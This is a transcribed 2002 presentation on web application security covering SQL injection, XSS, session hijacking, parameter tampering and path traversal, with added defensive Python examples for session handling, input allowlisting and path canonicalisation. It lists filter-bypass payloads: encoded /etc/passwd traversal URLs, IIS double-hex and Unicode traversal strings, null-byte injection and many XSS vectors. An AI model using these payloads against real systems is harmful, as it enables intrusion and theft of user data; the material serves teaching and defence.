Taking Aim at Web Applications
Dennis Groves, Bill Pennington
Copyright © 2002 Dennis Groves, Bill Pennington & Jeremiah Grossman
Mar 26, 2015
Introduction
Bill Pennington
Principal Consultant, Guardent
Tested over 300 web applications over the past 3 years
Dennis Groves
Specialty: Enterprise Security, Web Application Security, Pen-Testing & Quality Assurance.
Bio: Dennis is currently the Director of Internet Security Consulting for Centerstance, Inc. For the last 3 years his primary focus has been on Web Application Security. He is a founding member of the Open Web Application Project and a former Sanctum employee; he played a key role in the development of AppScan.
Why is this important?
Topics
This is not new
Why your firewall doesn’t matter
Types of attacks
Filter, Filter, Filter
Do you know where your data is?
Tools to help you
This is Not New
Problems with web applications are the same problems with standalone applications
Why your Firewall doesn’t matter
Standard rant
Top 5 Vulnerabilities
SQL insertion
XSS
Session Hijacking
Parameter manipulation
Unbounded file calls
Cross Site Scripting: Why you should care
XSS is not an attack on the server, it is an attack on the users of your application
So what?
Identity theft
User masquerading
Reputation Risk
SQL Insertion
Most common on MS-based applications
All SQL apps are vulnerable (Oracle, Sybase, DB2…)
Can lead to full compromise of the server (xp_cmdshell)
Almost guaranteed to lead to data compromise
Demo…
Cross Site Scripting (XSS)
Found in 98% of applications I test
2 main types:
Transient (URL based)
http://badapp.com/error.jsp?msg=<SCRIPT>alert("Test");</SCRIPT>
Sticky – Script placed in a static bit of web content
XSS continued…
Transient generally requires user interaction
What can happen? Possibilities are only restricted by the client
Cookie theft most common example
But I filter "<" and ">"! JScript entities: "&{alert('Test')};"
Session Hijacking
HTTP is stateless so application designers must build a way to track state
Cookies and URL strings are the most common ways to track state
Both are easily exploitable
Session Hijacking continued…
Generally the next thing to occur after XSS
Please people logout means logout!
Examples of common session tracking issues
Parameter Tampering
Programmers will store data anywhere!
URL parameters – http://badapp.com/checkout.pl?p=$1.00
Cookies – Cookie: p=$1.00
Hidden fields – not really hidden
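The defensive answer to both the session-tracking and the parameter-tampering slides is to keep state on the server under an unguessable identifier and to recompute anything that has a price attached. The following is an added example written for this page, not code from the authors or the slides; the catalogue, prices and the 900-second idle timeout are constructed values.

```python
import logging
import secrets
import time
from typing import Dict, Optional

log = logging.getLogger("session")
CATALOGUE = {"widget": 100, "gadget": 250}   # constructed prices (cents); server-side only
SESSION_TTL = 900                             # idle seconds before a session expires
_sessions: Dict[str, dict] = {}               # all state lives here, keyed by session id

def login(user: str) -> str:
    """Issue an unguessable session id (256 bits from the OS CSPRNG)."""
    sid = secrets.token_urlsafe(32)
    _sessions[sid] = {"user": user, "cart": {}, "last_seen": time.time()}
    return sid

def get_session(sid: str) -> Optional[dict]:
    """Return live session state, or None for unknown, expired or logged-out ids."""
    s = _sessions.get(sid)
    if s is None:
        return None
    if time.time() - s["last_seen"] > SESSION_TTL:
        del _sessions[sid]                     # idle timeout counts as logout
        return None
    s["last_seen"] = time.time()
    return s

def add_to_cart(sid: str, item: str, qty: int) -> bool:
    """Only catalogue items can be added; the client never names a price."""
    s = get_session(sid)
    if s is None or item not in CATALOGUE or qty <= 0:
        return False
    s["cart"][item] = s["cart"].get(item, 0) + qty
    return True

def checkout_total(sid: str, client_total: Optional[int] = None) -> Optional[int]:
    """Recompute the total from server-side state. A 'p=$1.00' style value sent
    by the client is ignored, and a mismatch is logged as a tamper attempt."""
    s = get_session(sid)
    if s is None:
        return None
    total = sum(CATALOGUE[i] * q for i, q in s["cart"].items())
    if client_total is not None and client_total != total:
        log.warning("tamper attempt by %s: claimed %d, actual %d", s["user"], client_total, total)
    return total

def logout(sid: str) -> None:
    """Logout means logout: destroy the id server-side, not just the cookie."""
    _sessions.pop(sid, None)
```

The same pattern applies to hidden form fields: anything the server needs to trust is looked up by the session id, never read back from the client.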
Unbound File Calls
Ye Ole' ../../
Watch out you don't display important information (global.asa)
Most application languages will take URLs as file arguments
Do you know where your data is?
Building an exclusionary filter is difficult because your data is all over the place
Data Flow example
Designing a proper filter
Make all filters default deny: don't try to exclude "bad stuff"
Try to get a good idea where your data is going
Log all filter violations
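A default-deny filter in the shape the slide describes, added here as an example rather than taken from the slides: each expected parameter gets a positive pattern, everything else is dropped and logged, and no attempt is made to recognise bad input. The parameter names, patterns and length cap are constructed for illustration.

```python
import logging
import re
from typing import Dict

log = logging.getLogger("filter")

# One allowlist per parameter the application actually expects (constructed for
# this example; the real list comes from mapping where each input flows).
ALLOWED = {
    "file": re.compile(r"[A-Za-z0-9_-]{1,32}"),        # bare name: no dots, no slashes
    "msg":  re.compile(r"[A-Za-z0-9 .,!?'-]{0,200}"),   # plain text only
    "page": re.compile(r"[0-9]{1,4}"),
}
MAX_PARAM_LEN = 256   # hard cap, checked before any pattern runs

def validate(params: Dict[str, str], remote: str = "?") -> Dict[str, str]:
    """Return only the parameters that match their allowlist.

    Unknown, oversized or non-matching input is dropped and logged. Nothing here
    tries to recognise 'bad' input (../, <SCRIPT>, %00, ...), so there is no
    blacklist for an encoding trick to slip past.
    """
    clean: Dict[str, str] = {}
    for name, value in params.items():
        rule = ALLOWED.get(name)
        if rule is None:
            log.warning("filter: unexpected parameter %r from %s", name, remote)
        elif len(value) > MAX_PARAM_LEN:
            log.warning("filter: %r too long (%d bytes) from %s", name, len(value), remote)
        elif not rule.fullmatch(value):
            log.warning("filter: %r rejected %r from %s", name, value[:64], remote)
        else:
            clean[name] = value
    return clean
```

Run it on already-decoded parameters (as a web framework hands them over), so that one-time URL decoding has happened before the pattern check and a surviving `%` is simply another non-matching character.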
Examples
ASP
PHP
Jscript
Perl
Bypassing poorly designed filters
All warfare is based on deception…If he is in superior strength, evade him.
–Sun Tzu, The Art of War, 500BC
Evasion is the art of blending in so you will not be noticed; of course this age-old technique of survival is still useful today.
evade
1. to escape or avoid somebody or something, usually by ingenuity or guile
2. to avoid doing something unpleasant, especially something that is a moral or legal obligation
3. to avoid dealing with or responding directly to something
4. to be difficult or impossible for somebody to find, obtain, or achieve (formal)
Filter Bypassing is a technique to evade detection by filtering systems.
Filter Bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of performing the various techniques described is to successfully bypass security measures designed to prevent certain types/amounts/values of data from being passed into a given system.
Many of the described techniques can be highly effective when used properly and become even more powerful when used in combination.
Most filter systems are very simple, as the flow chart shows.
Seven forms of ingenuity:
URL Encoded Strings
Double Hex Encoding
Unicode Encoded String
Long URLs
Case Sensitivity
XSS Filter-Bypass Manipulation
Null Character Injection
Evade: 1. to escape or avoid somebody or something, usually by ingenuity or guile…
The Hex Advantage
By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.
http://foo.com/cgi?file=/etc/passwd
Can become:
http://foo.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64
Double Hex Encoding
In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability.
The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL.
An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit a vulnerability.
When an un-patched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL.
IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding.
This secondary decoding was the source of another vulnerability.
IIS Double Hex
Round 1 Decoding:
scripts/..%255c../winnt
becomes:
scripts/..%5c../winnt
(%25 = "%" character)
Round 2 Decoding:
scripts/..%5c../winnt
becomes:
scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through Double Hex Encoding.
The Unicode Slash
In Unicode, "%c0%af" is the equivalent of a slash ("/").
Therefore the common IIS URL exploit:
scripts/..%c0%af../winnt
becomes:
scripts/../../winnt
Once again, directory path traversal is possible using path obfuscation through Unicode.
Double Slash
Double Slash: using multiple directory slashes in URLs. For example: http://www.foo.com/..//etc//passwd
Can be used to move under the radar of IDS systems and still function properly.
Long URLs
Many systems put limits on how much data a variable can store or a system can handle.
Often, if these limits are exceeded, the data will still be used but bypass certain security considerations.
URLs such as:
http://www.foo.com/cgi?param=filename
Replaced with:
http://www.foo.com/cgi?param=<2K_of_Data>
Case Sensitivity
Case sensitivity may play a role in many security filtration systems. Alternating case on URL parameters may be used to bypass certain restrictions.
http://foo.com/cgi?param=bar
http://foo.com/cgi?param=BaR
http://foo.com/CGI?param=BAR
Method Switching
Many web applications do not properly perform HTTP Request Method sanity checking.
Performing Method Switching can be used to bypass IDS, logging features and CGI security mechanisms.
Most web servers do not log "POST" data and thus forensic analysis is harder to perform.
The Request Method: GET /cgi-bin/some.cgi
can become: POST /cgi-bin/some.cgi
The Method token indicates the method to be performed on the resource identified by the Request-URI.
HTTP 1.1 Methods
OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT
Using your “HEAD”
The “HEAD” request method can be used to determine if a particular HTTP resource is accessible without actually downloading the resource data.
Scans and web application attacks can be made to be more effective using this technique.
Null Character Injection
Hex-encoded null characters can be used to thwart some security mechanisms.
This happens because in the "C" programming language, a null character designates the end of a string.
So if a CGI appends ".html" to an input parameter:
http://foo.com/cgi?file=../../etc/passwd%00
will cut off the appended ".html".
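The hex, double-hex, Unicode-slash, double-slash and null-character slides above all defeat filters that inspect the raw URL. The defence is to canonicalise first and check last: decode exactly once, refuse anything still encoded, decode UTF-8 strictly (%c0%af is an overlong encoding of "/" that a strict decoder rejects rather than accepts), drop control bytes, normalise the path and only then test containment. This is an added example for this page, not code from the slides; the document root is a constructed value.

```python
import posixpath
from urllib.parse import unquote_to_bytes

BASE = "/var/www/docs"   # constructed document root

class RejectedPath(ValueError):
    """Raised for any path the canonicaliser cannot prove safe."""

def canonical_path(raw: str) -> str:
    """Decode a user-supplied path exactly once, normalise it, and return the
    absolute path only if it is still under BASE."""
    # 1. One round of %-decoding, kept as bytes so bad UTF-8 is still visible.
    once = unquote_to_bytes(raw)
    if b"%" in once:          # %25xx survives one decode: double encoding
        raise RejectedPath("still percent-encoded after one decode")
    # 2. Strict UTF-8: the overlong form %c0%af of '/' is invalid and is refused.
    try:
        text = once.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise RejectedPath("invalid UTF-8 in path") from exc
    # 3. A NUL (or any control byte) would truncate the string in a C file call.
    if any(ord(c) < 0x20 for c in text):
        raise RejectedPath("control character in path")
    # 4. Treat backslash as a separator as well, the IIS ..%5c.. case.
    text = text.replace("\\", "/")
    # 5. Collapse //, resolve . and .., then require the result to stay in BASE.
    full = posixpath.normpath(posixpath.join(BASE, text.lstrip("/")))
    if full != BASE and not full.startswith(BASE + "/"):
        raise RejectedPath("path escapes the document root")
    return full

def is_safe(raw: str) -> bool:
    """Convenience wrapper for logging and tests: True if canonical_path accepts raw."""
    try:
        canonical_path(raw)
        return True
    except RejectedPath:
        return False
```

Every rejection is a filter violation worth logging with the raw input, since the encoded forms themselves are the indicator.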
Unicode (UTF-8) Encoded
Unicode is a universal way to represent characters.
However, unicode can also be used to circumvent security mechanisms by representing information in another fashion.
Microsoft IIS has had security issues in the past while supporting unicode.
URL Encoded String
The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the use of allowed characters in URLs to only a limited subset of the US-ASCII character set:
"...Only alphanumerics [0-9a-zA-Z], the special characters "$_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."
XSS Filter-Bypass Manipulation
This technique is used to pass various types of client-side scripting language through implemented security filters.
The idea is to achieve client-side execution of a client-side script.
There are several techniques used to perform this attack.
Test the Filters
Submit all the raw HTML tags you can find, and then view the output results.
Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript Event Handler).
This will show what HTML is allowed, what the changes were, and possible dangerous HTML that can be exploited.
SRCing the protocol
Using the “javascript” protocol in an HTML source attribute.
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">
Alternate Protocol SRCing
Same technique as the previous; however, using the protocols "livescript" and "mocha" will yield the same effect.
<IMG SRC="livescript:js_expression">
<IMG SRC="mocha:alert('test');">
Decimal HTML Entities
Variation on previous techniques: using decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.
<IMG SRC="java&#10;script:js_expression">
\09 \10 \11 \12 \13 have all been seen to work
Hex HTML Entities
Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions, yet execute JavaScript.
<IMG SRC="java&#x0A;script:js_expression">
Padding HTML Entities
Padding HTML entities with "0"s may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC="java&#0000009;script:js_expression">
STYLE JavaScript Type
Changing the MIME-TYPE on a “style” tag may be used to execute JavaScript.
<style TYPE="text/javascript">JS EXPRESSION</style>
<style TYPE="text/javascript">Alert(document.domain);</style>
STYLE JavaScript X-Type
Variation on the previous example, but by using the “application/x-javascript” MIME-TYPE, the filters may be bypassed.
<STYLE TYPE="application/x-javascript">
alert('JavaScript has been Executed');
</STYLE>
STYLE JavaScript Import
Using the @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css">
@import url(javascript:alert('Javascript is executed'));
</style>
STYLE URL Import
Using the @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css>
@import url(http://www.test.com);
</STYLE>
LINK Style Sheet
The “LINK” tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">
Style Left Expression
A few CSS features used together to execute JavaScript.
<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))" >
Remote SRCing
A few HTML tags, such as "LAYER", "ILAYER", "FRAME", and "IFRAME", can be used to src in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>
AND CURLY
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert('alert')};">
Syntax must be exact.
Dangerous HTML Tags
"All HTML is to be considered dangerous, but these tags are the most insidious."
<APPLET> <BODY> <EMBED> <FRAME> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE>
Dangerous HTML Attributes
(HTML tags with these attributes.)
SRC
LOWSRC
STYLE
HREF
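The SRC/HREF tricks in the preceding slides (javascript:, livescript: and mocha: schemes, decimal, hex and zero-padded entities, control characters inside the scheme, and the &{...}; entity form) all target filters that look for a literal string before decoding. A filter that undoes those encodings first and then allows only known schemes has nothing left to be evaded by them. This is an added example for this page, not the slides' own code; the allowed-scheme set is an assumption for a site that only embeds http and https resources.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}
# Control characters and whitespace that browsers of the period skipped inside a
# scheme, which let "java<TAB>script:" past filters matching the literal string.
_CTRL = re.compile(r"[\x00-\x20\x7f]")

def normalise_url(value: str) -> str:
    """Undo the encodings the filter-bypass slides rely on before checking."""
    decoded = html.unescape(value)          # &#106; &#x6A; &#0000106; -> 'j'
    return _CTRL.sub("", decoded)           # drop \09 \10 \11 \12 \13 etc.

def attribute_url_allowed(value: str) -> bool:
    """True only for URLs a SRC/HREF/LOWSRC attribute may carry."""
    if "&{" in value:                       # JavaScript entity syntax &{...};
        return False
    url = normalise_url(value)
    scheme = urlsplit(url).scheme.lower()
    if scheme == "":
        return ":" not in url               # plain relative reference only
    return scheme in SAFE_SCHEMES           # javascript:, livescript:, mocha: fail here

def render_src(value: str) -> Optional[str]:
    """Attribute value ready to emit, or None when the URL is rejected."""
    if not attribute_url_allowed(value):
        return None
    return html.escape(normalise_url(value), quote=True)
```

STYLE attributes and tags are a separate problem (expression(), @import) and should simply not be accepted from users at all, which is the default-deny rule from the filter-design slide applied to the tag list above.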
Why automated tools don't work very well
Every programmer does things a little differently
Authentication schemes are hard to automate
Error codes are not standardized
Sometimes simple things like SSL get in the way
Some good things:
Completeness
Large knowledge bases (at least possibly)
Why people are better
Recognition of subtle errors
We understand the impact and therefore the risk of a vulnerability
We can find “real” bugs, flaws in logic
One tool to rule them all…
Conclusion
Questions